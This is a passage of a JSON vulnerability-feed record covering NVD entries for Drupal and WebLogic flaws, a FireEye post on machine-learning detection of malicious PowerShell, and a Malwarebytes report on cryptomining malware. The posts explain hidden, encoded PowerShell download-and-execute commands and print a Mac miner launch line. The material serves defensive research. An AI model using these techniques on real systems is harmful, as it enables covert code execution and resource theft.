"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26084", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T18:38:38", "description": "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T07:29:00", "type": "cve", "title": "CVE-2018-7600", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-01T18:04:00", "cpe": ["cpe:/a:drupal:drupal:7.57", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0"], "id": "CVE-2018-7600", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7600", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.57:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-04-27T19:41:24", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-26T19:29:00", "type": "cve", "title": "CVE-2019-2725", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-04-27T16:39:00", "cpe": ["cpe:/a:oracle:agile_plm:9.3.5", "cpe:/a:oracle:agile_plm:9.3.4", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.57", "cpe:/a:oracle:storagetek_tape_analytics_sw_tool:2.3", "cpe:/a:oracle:tape_virtual_storage_manager_gui:6.2", "cpe:/a:oracle:communications_converged_application_server:7.1", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.56", "cpe:/a:oracle:vm_virtualbox:5.2.36", "cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:tape_library_acsls:8.5", "cpe:/a:oracle:communications_converged_application_server:5.1", "cpe:/a:oracle:communications_converged_application_server:7.0", "cpe:/a:oracle:agile_plm:9.3.3", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.58"], "id": "CVE-2019-2725", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-2725", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:agile_plm:9.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_converged_application_server:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_converged_application_server:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:tape_virtual_storage_manager_gui:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_converged_application_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:5.2.36:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:tape_library_acsls:8.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*"]}], "fireeye": [{"lastseen": "2018-08-31T00:18:22", "description": "#### Introduction****\n\nCyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to [install backdoors](<https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html>), [execute malicious code](<https://www.csoonline.com/article/3227046/malware/what-is-a-fileless-attack-how-hackers-invade-systems-without-installing-software.html>), and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.\n\nIn this post you will learn:\n\n * Why malicious PowerShell can be challenging to detect with a traditional \u201csignature-based\u201d or \u201crule-based\u201d detection engine.\n * How Natural Language Processing (NLP) can be applied to tackle this challenge.\n * How our NLP model detects malicious PowerShell commands, even if obfuscated.\n * The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.\n\n#### Background****\n\nPowerShell is one of the most [popular tools](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).\n\n \nFigure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 \u2013 blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series\n\nFireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the [tactics, techniques and procedures (TTPs) used in PowerShell attacks](<https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf>), as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to [improve PowerShell logging](<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>), which gives greater visibility into potential attacker activity. More recently, our in-depth report on [APT32](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.\n\n \nFigure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain\n\nLet\u2019s take a deep dive into an example of a malicious PowerShell command (Figure 3).\n\n \nFigure 3: Example of a malicious PowerShell command\n\nThe following is a quick explanation of the [arguments](<https://docs.microsoft.com/en-us/powershell/scripting/powershell-scripting?view=powershell-6>):\n\n * -NoProfile \u2013 indicates that the current user\u2019s profile setup script should not be executed when the PowerShell engine starts.\n * -NonI \u2013 shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.\n * -W Hidden \u2013 shorthand for \u201c-WindowStyle Hidden\u201d, which indicates that the PowerShell session window should be started in a hidden manner.\n * -Exec Bypass \u2013 shorthand for \u201c-ExecutionPolicy Bypass\u201d, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn\u2019t meant to be a security boundary.\n * -encodedcommand \u2013 indicates the following chunk of text is a base64 encoded command.\n\nWhat is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.\n\n \nFigure 4: The decoded command for the aforementioned example\n\nInterestingly, the decoded command unveils a stealthy fileless network access and remote content execution!\n\n * _IEX_ is an alias for the _Invoke-Expression_ cmdlet that will execute the command provided on the local machine.\n * **The _new-object_** cmdlet creates an instance of a .NET Framework or COM object, here a _net.webclient_ object.\n * The _downloadstring_ will download the contents from <url> into a memory buffer (which in turn _IEX_ will execute).\n\nIt\u2019s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting [CVE-2017-10271 to deliver a cryptocurrency miner](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>). This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.\n\nThere are several reasons why adversaries prefer PowerShell:\n\n 1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.\n 2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.\n 3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.\n\nAdditionally, from an economics perspective:\n\n * Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with [open source obfuscation tools](<https://www.fireeye.com/blog/threat-research/2017/07/revoke-obfuscation-powershell.html>).\n * Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.\n\nNext, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.\n\n#### Natural Language Processing for Detecting Malicious PowerShell****\n\nCan we use machine learning to predict if a PowerShell command is malicious?\n\nOne advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.\n\nAfter we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.\n\nOne of the technical challenges we tackled was** **synonym, a problem studied in linguistics. For instance, \u201cNOL\u201d, \u201cNOLO\u201d, and \u201cNOLOGO\u201d have identical semantics in PowerShell syntax. In NLP, a [stemming](<https://en.wikipedia.org/wiki/Stemming>) algorithm will reduce the word to its original form, such as \u201cInnovating\u201d being stemmed to \u201cInnovate\u201d.\n\nWe created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as [trie](<https://en.wikipedia.org/wiki/Trie>), as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.\n\n \nFigure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)\n\nThe overall NLP pipeline we developed is captured in the following table:\n\nNLP Key Modules\n\n| \n\nFunctionality \n \n---|--- \n \nDecoder\n\n| \n\nDetect and decode any encoded text \n \nNamed Entity Recognition (NER)\n\n| \n\nDetect and recognize any entities such as IP, URL, Email, Registry key, etc. \n \nTokenizer\n\n| \n\nTokenize the PowerShell command into a list of tokens \n \nStemmer\n\n| \n\nStem tokens into semantically identical token, uses trie \n \nVocabulary Vectorizer\n\n| \n\nVectorize the list of tokens into machine learning friendly format \n \nSupervised classifier\n\n| \n\nBinary classification algorithms:\n\n * Kernel Support Vector Machine\n * Gradient Boosted Trees\n * Deep Neural Networks \n \nReasoning\n\n| \n\nThe explanation of why the prediction was made. Enables analysts to validate predications. \n \nThe following are the key steps when streaming the aforementioned example through the NLP pipeline:\n\n * Detect and decode the Base64 commands, if any\n * Recognize entities using Named Entity Recognition (NER), such as the <URL>\n * Tokenize the entire text, including both clear text and obfuscated commands\n * Stem each token, and vectorize them based on the vocabulary\n * Predict the malicious probability using the supervised learning model\n\n \nFigure 6: NLP pipeline that predicts the malicious probability of a PowerShell command\n\nMore importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.\n\n \nFigure 7: End-to-end machine learning production pipeline for PowerShell machine learning\n\n#### Value Validated in the Field****\n\nWe successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:\n\n * Commodity malware such as Kovter.\n * Red team penetration test activities.\n * New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.\n\nThe unique values brought by the PowerShell machine learning detection engine include: \n\n * The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.\n * The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.\n\nThe ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.\n\n#### Acknowledgements\n\nWe would like to acknowledge:\n\n * Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.\n * Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.\n * Research endpoint support from Caleb Madrigal.\n * The FireEye ICE-DS Team.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-10T12:00:00", "type": "fireeye", "title": "Malicious PowerShell Detection via Machine Learning", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-07-10T12:00:00", "id": "FIREEYE:6B4CFD4290F6444DFC070D828CEC509A", "href": "https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "malwarebytes": [{"lastseen": "2018-02-26T16:50:59", "description": "While cryptocurrencies have been around for a long time and used for legitimate purposes, online criminals have certainly tarnished their reputation. Unfortunately, the same benefits offered by these decentralized and somewhat anonymous digital currencies were quickly abused to extort money, as was the case during the various ransomware outbreaks we\u2019ve witnessed in the last few years.\n\nAs the value of cryptocurrencies\u2014driven by the phenomenal rise of Bitcoin\u2014has increased significantly, a new kind of threat has become mainstream, and some might say has even surpassed all other cybercrime. Indeed, cryptocurrency mining is such a lucrative business that malware creators and distributors the world over are drawn to it like moths to a flame. The emergence of a multitude of new cryptocurrencies that can be mined by average computers has also contributed to the widespread abuse we are witnessing.\n\nMalwarebytes has been blocking coin miners with its multiple protection modules, including our real-time scanner and web protection technology. Ever since September 2017, malicious cryptomining has been our top detection overall.\n\n### Cryptomining malware\n\nTo maximize their profits, threat actors are leveraging the computing power of as many devices as they can. But first, they must find ways to deliver the malicious coin miners on a large enough scale.\n\nWhile the Wannacry ransomware was highly publicized for taking advantage of the leaked EternalBlue and DoublePulsar exploits, at least [two different groups](<https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators>) used those same vulnerabilities to infect hundreds of thousands of Windows servers with a cryptocurrency miner, ultimately generating millions of dollars in revenue.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/IP__scan-1.png> \"\" )\n\n_Figure 1: Worm scanning random IP addresses on port 445 _\n\nOther vulnerabilities, such as a flaw with Oracle's WebLogic Server ([CVE-2017-10271](<https://www.cvedetails.com/cve/CVE-2017-10271/>)), were also used to deliver miners onto servers at [universities and research institutions](<https://www.ren-isac.net/public-resources/alerts/REN-ISAC_ADVISORY_Oracle_WebLogic_Vulnerability_Bitcoin_Miner_Attacks_20180105v1.pdf>). While Oracle released a [patch](<https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html>) in October 2017, many did not apply it in a timely fashion, and a [PoC](<https://github.com/Luffin/CVE-2017-10271>) only facilitated widespread abuse.\n\nAs it turns out, servers happen to be a favorite among criminals because they offer the most horsepower, or to use the proper term, the highest hash rate to crunch through and solve the mathematical operations required by cryptomining. In recent times, we saw individuals who, against their better judgement, took this to the next level by using supercomputers in various [critical infrastructure](<https://www.wired.com/story/cryptojacking-critical-infrastructure/>) environments.\n\n### Spam and exploit kits campaigns\n\nEven malware authors have caught the cryptocurrency bug. Existing malware families like Trickbot, distributed via malicious spam attachments, temporarily added in a [coin miner module](<https://twitter.com/VK_Intel/status/959194022735523841>).\n\nInterestingly, the Trickbot authors had already expanded their banking Trojan to [steal credentials from Coinbase users](<https://blogs.forcepoint.com/security-labs/trickbot-goes-after-cryptocurrency>) as they logged into their electronic wallet. The modular nature of their malware is certainly making it easier for them to experiment with new schemes to make money.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Spam-1.png> \"\" )\n\n_Figure 2: Document containing macro that downloads the TrickBot malware_\n\nSeveral exploit kits, and [RIG EK](<https://blog.malwarebytes.com/threat-analysis/2018/01/rig-exploit-kit-campaign-gets-deep-into-crypto-craze/>) in particular have been distributing miners, usually via the intermediary of the SmokeLoader malware. In fact, cryptominers are one of the most commonly served payloads in drive-by download attacks.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/RIG_miner-1.png> \"\" )\n\n_Figure 3: An iframe redirection to RIG EK followed by a noticeable coin miner infection_\n\n### Mobile and Mac cryptominers\n\nMobile users are not immune to cryptomining either, as [Trojanized apps laced with mining code](<https://blog.malwarebytes.com/cybercrime/2018/02/bogus-hack-apps-hack-users-back-for-cryptocash/>) are also commonplace, especially for the Android platform. Similarly to Windows malware, malicious APKs tend to have modules for specific functionalities, such as SMS spam and of course miners.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android-1.jpg> \"\" )\n\n_Figure 4: Source code for the mining component within an Android APK_\n\nLegitimate mining pools such as [Minergate](<https://en.bitcoin.it/wiki/MinerGate>) are often used by those Android miners, and the same is true for [Mac cryptominers](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-information-unfolds-regarding-mac-cryptominer/>). The usual advice on sticking to official websites to download applications applies but is not always enough, especially when [trusted applications get hacked](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Mac-1.png> \"\" )\n \n \n ~/Library/Apple/Dock -user sarahmayergo1990@gmail.com@gmail.com -xmr\n\n_Figure 5: Malicious Mac application launching a Monero miner_\n\n### Drive-by cryptomining\n\nIn mid-September 2017, a mysterious entity called Coinhive launched a new service that was about to create chaos on the web, as it introduced an API to mine the Monero currency directly within the browser.\n\nWhile in-browser miners have taken off because of Coinhive's popularity, they had already been tested a few years ago, mostly as proof-of-concepts that did not develop much further. There is, however, the legal precedent of a [group of students at MIT](<https://venturebeat.com/2014/02/12/new-jersey-slaps-mit-bitcoin-hackers-with-subpoena-and-theyre-fighting-back/>) who got sued by the state of New Jersey for their coin mining attempt\u2014called Tidbit\u2014proposed as an alternative to traditional display advertising.\n\n#### **No opt-in by default**\n\nWithin weeks, the Coinhive API, void of any safeguards, was abused in drive-by cryptomining attacks. Similar to drive-by downloads, [drive-by mining](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) is an automated, silent, and platform agnostic technique that forces visitors to a website to mine for cryptocurrency.\n\nWe witnessed an interesting [campaign](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) that was specifically designed for Android and drew millions of users to pages that immediately started to mine for Monero under the pretense of recouping server costs. Even though mobile devices aren't as powerful as desktops, let alone servers, this event showed that no one is immune to drive-by mining.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android_Drive_by-mining-1-1.png> \"\" )\n\n_Figure 6: An in-browser miner for Chrome on Android _\n\n[Malvertising](<https://blog.malwarebytes.com/threat-analysis/2017/09/drive-by-mining-and-ads-the-wild-wild-west/>) was once again a major factor in spreading coin miners to a large audience, as we saw with the [YouTube case](<https://twitter.com/Mystic_Ervo/status/956237422391709696>) that involved malicious ads via DoubleClick. Another interesting vector, which security people have warned about for years, is the use of third-party scripts that have become ubiquitous. A company called Texthelp had one of their [plugins compromised](<https://www.troyhunt.com/the-javascript-supply-chain-paradox-sri-csp-and-trust-in-third-party-libraries/>) and injected with a Coinhive script, leading to hundreds of government websites in the UK unwillingly participating in malicious cryptomining activity.\n\nTo fend off criticism, Coinhive introduced a new API (AuthedMine) that explicitly requires user input for any mining activity to be allowed. The idea was that considerate website owners would use this more \u201cethical\u201d API instead, so that their visitors can knowingly opt-in or out before engaging in cryptomining. This was also an argument that Coinhive put forward to defend its stance against ad blockers and antivirus products.\n\nWhile only Coinhive themselves would have accurate statistics, according to our own telemetry the opt-in version of their API was barely used (40K/day) in comparison to the silent one (3M/day), as pictured in the below histograms during the period of January 10 to February 6.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_opt-in-1.png> \"\" )\n\n_Figure 7: Usage statistics for the opt-in version of Coinhive_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_silent_drive-by-1.png> \"\" )\n\n_Figure 8: Usage statistics for the silent version of Coinhive_\n\nMoreover, even websites that do use the opt-in option may still be crippling machines by running an unthrottled miner, as was the case with popular[ American news website Salon](<https://twitter.com/jonathansampson/status/963465011153833984>)[[.]com](<https://twitter.com/jonathansampson/status/963465011153833984>).\n\n#### **Copycats**\n\nSeveral copycats emerged in the wake of Coinhive's immediate success. According to our stats, _coin-have[.]com_ is the second most popular service, followed by _crypto-loot[.]com_. While Coinhive takes a 30 percent commission on all mining earnings, Coin Have advertises the lowest commission rates in the market at 20 percent, although CryptoLoot itself claims to pay out 88 percent of mined commissions.\n\nIn additions to bigger payouts, other \u201cattractive\u201d features pushed by newcomers are low payment thresholds and the ability to bypass ad blockers, which they often view as their number one threat.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/copycats-1.png> \"\" )\n\n_Figure 9: Two of the most popular Coinhive copycats_\n\n#### **Browsers and technologies abused**\n\nContrary to malware-based coin miners, drive-by cryptomining does not require infecting a machine. This is both a strength and weakness in the sense that it can potentially reach a much wider audience but is also more ephemeral in nature.\n\nFor example, if a user navigates away from the website they are on or closes the offending tab, that will cause the mining activity to stop, which is a major drawback. However, we observed that some miners have developed sneaky ways of making drive-by mining [persistent](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>), thanks to the use of pop-unders, a practice well-known in the ad fraud business. To add insult to injury, the malicious pop-under tab containing the mining code would get placed right underneath the taskbar, rendering it virtually invisible to the end user. Thanks to this trick, the mining can carry on until the user actually restarts their computer.\n\nAnother way to mine for long and uninterrupted periods of time is by using a booby-trapped browser extension that will inject code in each web session. This is what happened to the Archive Poster extension because one of their developers had his Google account credentials compromised.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/extension-1.png> \"\" )\n\n_Figure 10: The compromised extension with a rogue JavaScript for Coinhive_\n\nIt is worth noting that JavaScript is not the only way to mine for coins within the browser. Indeed, we have observed WebAssembly, a newer format available in modern browsers, being used more and more. WebAssembly modules have the advantage of running at near native speed, making them a lot faster and more efficient than JavaScript.\n \n \n | payload =\n \u00a0 - [ ExportSection\n \u00a0\u00a0\u00a0 | count = 27\n \u00a0\u00a0\u00a0 | entries =\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 9\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"stackSave\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 71\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 17\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"_cryptonight_hash\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 70\n\n_Figure 11: Code snippet from a WebAssembly module designed for mining Monero_\n\nWhile drive-by mining typically happens via the standard HTTP protocol\u2014either via HTTP or HTTPS connections\u2014we have witnessed more and more examples of miners communicating via WebSockets instead.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/websocket_-1.png> \"\" )\n\n_Figure 12: A Web Socket connection to Coinhive_\n\nA WebSocket is another communication protocol that allows streams of data to be exchanged. There is an initial handshake request and response with a remote server followed by the actual data streams. Coin mining code wrapped within a secure (wss) WebSocket is more difficult to identify and block.\n\n### Conclusion\n\nAs the threat landscape continues to evolve, its connections to real-world trends become more and more obvious. Malware authors are not only enjoying the relative anonymity provided by digital currencies but also want to amass them.\n\nCryptomining malware provides a good use case for leveraging the size and power of a botnet in order to perform CPU-intensive mining tasks without having to bear the costs incurred in the process. In some aspect, drive-by mining also applies the same concept, except that the botnet of web users it creates is mostly temporary.\n\nWhile malicious cryptomining appears to be far less dangerous to the user than ransomware, its effects should not be undermined. Indeed, unmanaged miners could seriously disrupt business or infrastructure critical processes by overloading systems to the point where they become unresponsive and shut down. Under the disguise of a financially-motivated attack, this could be the perfect alibi for advanced threat actors.\n\nMalwarebytes users, regardless of their platform, are protected against unwanted cryptomining, whether it is done via malware or the web.\n\nThe post [The state of malicious cryptomining](<https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-02-26T16:08:03", "type": "malwarebytes", "title": "The state of malicious cryptomining", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-02-26T16:08:03", "href": "https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/", "id": "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-01-29T00:20:57", "description": "", "cvss3": {}, "published": "2018-01-28T00:00:00", "type": "packetstorm", "title": "Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-28T00:00:00", "id": "PACKETSTORM:146143", "href": 